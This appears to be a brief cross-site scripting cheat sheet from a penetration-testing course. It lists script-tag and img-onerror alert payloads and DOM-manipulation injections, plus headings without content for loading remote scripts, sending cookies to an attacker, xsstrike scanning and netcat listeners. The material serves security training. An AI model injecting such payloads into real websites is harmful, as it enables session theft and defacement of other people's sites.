XSS
Basic Payloads
Basic alert XSS
<script>alert(window.origin)</script>Plaintext injection
<plaintext>Basic print execution
<script>print()</script>HTML-based alert XSS
<img src="" onerror=alert(window.origin)>DOM Manipulation
Change background color
<script>document.body.style.background = "#141d2b"</script>Change background image
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>Change website title
Overwrite website's main body
Remove specific HTML element
Advanced Payloads
Load remote script
Send cookie data to attacker
Common Commands
Scanning and Exploitation
Run xsstrike on a URL parameter
Networking
Start netcat listener
Start PHP server
Last updated